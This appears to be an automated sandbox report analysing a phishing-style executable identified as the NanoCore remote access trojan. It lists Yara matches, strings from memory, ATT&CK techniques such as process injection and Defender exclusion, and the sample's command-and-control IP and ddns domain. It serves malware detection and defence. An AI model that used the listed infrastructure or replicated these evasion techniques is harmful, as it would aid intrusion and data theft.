Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe VolumeInformation
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Nanocore RATShow sources
Source: Yara matchFile source: 18.2.#RFQ ORDER7678432213211.exe.4088a48.3.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 18.2.#RFQ ORDER7678432213211.exe.5940000.17.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 18.2.#RFQ ORDER7678432213211.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 18.2.#RFQ ORDER7678432213211.exe.5944629.16.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 18.2.#RFQ ORDER7678432213211.exe.5940000.17.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 18.2.#RFQ ORDER7678432213211.exe.4088a48.3.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 18.2.#RFQ ORDER7678432213211.exe.408d071.4.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 00000012.00000002.477033384.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000002.493731765.0000000005940000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000002.490625846.0000000004081000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: #RFQ ORDER7678432213211.exe PID: 1328, type: MEMORY

Remote Access Functionality:

barindex
Detected Nanocore RatShow sources
Source: #RFQ ORDER7678432213211.exe, 00000012.00000002.485095538.0000000003078000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
Source: #RFQ ORDER7678432213211.exe, 00000012.00000002.485095538.0000000003078000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Yara detected Nanocore RATShow sources
Source: Yara matchFile source: 18.2.#RFQ ORDER7678432213211.exe.4088a48.3.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 18.2.#RFQ ORDER7678432213211.exe.5940000.17.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 18.2.#RFQ ORDER7678432213211.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 18.2.#RFQ ORDER7678432213211.exe.5944629.16.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 18.2.#RFQ ORDER7678432213211.exe.5940000.17.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 18.2.#RFQ ORDER7678432213211.exe.4088a48.3.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 18.2.#RFQ ORDER7678432213211.exe.408d071.4.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 00000012.00000002.477033384.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000002.493731765.0000000005940000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000002.490625846.0000000004081000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: #RFQ ORDER7678432213211.exe PID: 1328, type: MEMORY

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation1Scheduled Task/Job1Process Injection112Masquerading1Input Capture11Query Registry1Remote ServicesInput Capture11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/Job1Boot or Logon Initialization ScriptsScheduled Task/Job1Disable or Modify Tools11LSASS MemorySecurity Software Discovery211Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion131Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationRemote Access Software1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSVirtualization/Sandbox Evasion131Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol1SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptHidden Files and Directories1LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncSystem Information Discovery12Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobTimestomp1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 451085 Sample: #RFQ ORDER7678432213211.exe Startdate: 20/07/2021 Architecture: WINDOWS Score: 100 42 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 13 other signatures 2->48 7 #RFQ ORDER7678432213211.exe 7 2->7         started        process3 file4 30 C:\Users\user\AppData\...\XgPYsUfalKn.exe, PE32 7->30 dropped 32 C:\Users\...\XgPYsUfalKn.exe:Zone.Identifier, ASCII 7->32 dropped 34 C:\Users\user\AppData\Local\...\tmpFD92.tmp, XML 7->34 dropped 36 C:\Users\...\#RFQ ORDER7678432213211.exe.log, ASCII 7->36 dropped 50 Adds a directory exclusion to Windows Defender 7->50 52 Injects a PE file into a foreign processes 7->52 11 #RFQ ORDER7678432213211.exe 7->11         started        16 powershell.exe 24 7->16         started        18 powershell.exe 25 7->18         started        20 2 other processes 7->20 signatures5 process6 dnsIp7 40 194.5.98.120, 1604, 49726, 49729 DANILENKODE Netherlands 11->40 38 C:\Users\user\AppData\Roaming\...\run.dat, Non-ISO 11->38 dropped 54 Hides that the sample has been downloaded from the Internet (zone.identifier) 11->54 22 conhost.exe 16->22         started        24 conhost.exe 18->24         started        26 conhost.exe 20->26         started        28 conhost.exe 20->28         started        file8 signatures9 process10

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
#RFQ ORDER7678432213211.exe13%ReversingLabsWin32.Trojan.AgentTesla
#RFQ ORDER7678432213211.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe100%Joe Sandbox ML
C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe13%ReversingLabsWin32.Trojan.AgentTesla

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
18.2.#RFQ ORDER7678432213211.exe.5940000.17.unpack100%AviraTR/NanoCore.fadteDownload File
18.2.#RFQ ORDER7678432213211.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://www.galapagosdesign.com/0%URL Reputationsafe
http://www.galapagosdesign.com/0%URL Reputationsafe
http://www.galapagosdesign.com/0%URL Reputationsafe
http://www.galapagosdesign.com/0%URL Reputationsafe
http://www.fontbureau.comF0%URL Reputationsafe
http://www.fontbureau.comF0%URL Reputationsafe
http://www.fontbureau.comF0%URL Reputationsafe
http://www.fontbureau.comF0%URL Reputationsafe
http://www.galapagosdesign.com/staff/dennis.htmI;0%Avira URL Cloudsafe
http://www.agfamonotype.0%URL Reputationsafe
http://www.agfamonotype.0%URL Reputationsafe
http://www.agfamonotype.0%URL Reputationsafe
http://www.agfamonotype.0%URL Reputationsafe
http://www.fonts.comd0%Avira URL Cloudsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://www.jiyu-kobo.co.jp//tr0%Avira URL Cloudsafe
http://www.jiyu-kobo.co.jp/jp/j.0%Avira URL Cloudsafe
http://www.galapagosdesign.com/W0%Avira URL Cloudsafe
https://go.micro0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
http://www.tiro.com0%URL Reputationsafe
http://www.tiro.com0%URL Reputationsafe
http://www.tiro.com0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/X.0%Avira URL Cloudsafe
194.5.98.1200%Avira URL Cloudsafe
http://www.jiyu-kobo.co.jp/u.0%Avira URL Cloudsafe
http://www.jiyu-kobo.co.jp/jp/O.0%Avira URL Cloudsafe
http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
joseedward5001.ddns.net0%Avira URL Cloudsafe
http://www.fontbureau.coma0%URL Reputationsafe
http://www.fontbureau.coma0%URL Reputationsafe
http://www.fontbureau.coma0%URL Reputationsafe
http://www.fontbureau.comasva0%Avira URL Cloudsafe
http://www.jiyu-kobo.co.jp/X7e0%Avira URL Cloudsafe
http://www.fontbureau.comaV.0%Avira URL Cloudsafe
http://www.fontbureau.comgrita0%URL Reputationsafe
http://www.fontbureau.comgrita0%URL Reputationsafe
http://www.fontbureau.comgrita0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/s0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/s0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/s0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/Y0-f0%Avira URL Cloudsafe
http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/n-u0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/n-u0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/n-u0%URL Reputationsafe
http://www.fonts.comp0%Avira URL Cloudsafe
http://www.jiyu-kobo.co.jp/Y.0%Avira URL Cloudsafe
http://www.jiyu-kobo.co.jp/2.0%Avira URL Cloudsafe
http://www.jiyu-kobo.co.jp/O.0%Avira URL Cloudsafe
http://www.jiyu-kobo.co.jp/c.U0%Avira URL Cloudsafe
http://www.jiyu-kobo.co.jp/rV.0%Avira URL Cloudsafe
http://www.sakkal.com0%URL Reputationsafe
http://www.sakkal.com0%URL Reputationsafe
http://www.sakkal.com0%URL Reputationsafe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
194.5.98.120true
  • Avira URL Cloud: safe
unknown
joseedward5001.ddns.nettrue
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://www.fontbureau.com#RFQ ORDER7678432213211.exe, 00000000.00000003.224155563.000000000564C000.00000004.00000001.sdmpfalse
    		high
    http://www.galapagosdesign.com/#RFQ ORDER7678432213211.exe, 00000000.00000003.222450009.0000000005677000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    http://www.fontbureau.comF#RFQ ORDER7678432213211.exe, 00000000.00000003.220096464.000000000564C000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    http://www.galapagosdesign.com/staff/dennis.htmI;#RFQ ORDER7678432213211.exe, 00000000.00000003.223772397.000000000564C000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://www.agfamonotype.#RFQ ORDER7678432213211.exe, 00000000.00000003.224155563.000000000564C000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    http://www.fonts.comd#RFQ ORDER7678432213211.exe, 00000000.00000003.215745931.0000000000DFC000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000A.00000003.386127494.00000000076E4000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    http://www.jiyu-kobo.co.jp//tr#RFQ ORDER7678432213211.exe, 00000000.00000003.218089594.0000000005642000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://www.jiyu-kobo.co.jp/jp/j.#RFQ ORDER7678432213211.exe, 00000000.00000003.218561472.0000000005649000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000A.00000003.386127494.00000000076E4000.00000004.00000001.sdmpfalse
      		high
      http://www.galapagosdesign.com/W#RFQ ORDER7678432213211.exe, 00000000.00000003.222450009.0000000005677000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://go.micropowershell.exe, 00000008.00000003.389513372.0000000005A9B000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000003.395464833.00000000051BF000.00000004.00000001.sdmpfalse
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      		unknown
      http://www.tiro.com#RFQ ORDER7678432213211.exe, 00000000.00000003.217505680.0000000005654000.00000004.00000001.sdmpfalse
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      		unknown
      http://www.jiyu-kobo.co.jp/X.#RFQ ORDER7678432213211.exe, 00000000.00000003.218089594.0000000005642000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://www.jiyu-kobo.co.jp/u.#RFQ ORDER7678432213211.exe, 00000000.00000003.218359434.000000000564F000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://www.jiyu-kobo.co.jp/jp/O.#RFQ ORDER7678432213211.exe, 00000000.00000003.218446869.0000000005646000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://www.jiyu-kobo.co.jp/jp/#RFQ ORDER7678432213211.exe, 00000000.00000003.218561472.0000000005649000.00000004.00000001.sdmp, #RFQ ORDER7678432213211.exe, 00000000.00000003.218259854.000000000564A000.00000004.00000001.sdmpfalse
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      		unknown
      http://www.fontbureau.coma#RFQ ORDER7678432213211.exe, 00000000.00000003.224155563.000000000564C000.00000004.00000001.sdmpfalse
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      		unknown
